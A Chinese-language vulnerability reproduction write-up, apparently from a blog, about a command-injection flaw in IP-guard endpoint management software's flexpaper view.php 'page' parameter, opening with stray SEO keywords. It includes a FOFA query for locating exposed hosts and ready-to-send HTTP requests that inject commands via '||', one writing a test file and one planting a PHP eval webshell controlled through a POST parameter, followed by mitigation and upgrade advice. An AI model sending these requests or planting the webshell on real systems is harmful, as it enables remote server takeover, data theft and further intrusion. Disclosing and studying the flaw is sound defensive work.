西宁网站制作,深圳网站seo教程,seo搜狗,下载百度到桌面上0x01 产品简介 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件#xff0c;旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
0x02 漏洞概述 漏洞成因 在Web应用程序的实现中#xff0c;参数的处理和验证是确保应用安全的关键环节…0x01 产品简介 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
0x02 漏洞概述 漏洞成因 在Web应用程序的实现中参数的处理和验证是确保应用安全的关键环节。然而当参数处理不当时就会出现安全漏洞给攻击者留下可利用的空间。在此次 IP-guard 的漏洞中关键问题出现在对某个参数的处理上。该参数原本用于指定要查看的文档页面。但由于未对输入进行适当的过滤和限制攻击者能够通过命令注入的方式利用该参数在服务器上执行任意命令。利用特征 针对这个漏洞从流量层面的利用特征表现在不寻常的HTTP GET请求中。在正常情况下这个存在漏洞的参数应该只包含数字或预定义格式的数据用于指定文档的特定页面。然而在攻击流量中该参数的值包含了操作系统命令这些命令通常以特殊字符如管道符 ||开始后跟可执行的系统命令。漏洞影响 该漏洞的成功利用允许攻击者在服务器上远程执行命令导致服务器完全被接管。同时攻击者不仅可以利用漏洞获取对服务器的控制权进而还可能访问或删除敏感数据植入恶意软件甚至使用服务器作为发起进一步攻击的跳板。
0x03 影响范围 IP-guard 4.81.0307.0
0x04 复现环境
FOFAIP-guard icon_hash2030860561 0x05 漏洞复现
PoC
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc1.jpgformatswfisSplittruepage||echo1234561.txt HTTP/1.1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
写文件 验证
GET /ipg/static/appr/lib/flexpaper/php/1.txt HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9 漏洞利用 写WebShell
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc1.jpgformatswfisSplittruepage||echo^?phpmb_eregi_replace(.*,$_POST[a],,ee);?^1.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9 验证 0x06 修复建议
临时缓解方案 配置入侵检测系统IDS和入侵防御系统IPS以及Web应用防火墙WAF以识别和阻止包含这类特征的请求从而保护系统免受此类远程命令执行攻击的影响同时为了避免攻击者绕过安全设备实施攻击建议尽快修复漏洞。 如非必要不要将 IP-guard 放置在公网上。或通过网络ACL策略限制访问来源例如只允许来自特定IP地址或地址段的访问请求。升级修复方案 官方已发布新版本修复漏洞建议尽快访问官网https://www.ip-guard.net/或联系官方售后支持获取版本升级安装包或补丁升级至4.81.0307.0版本及以上
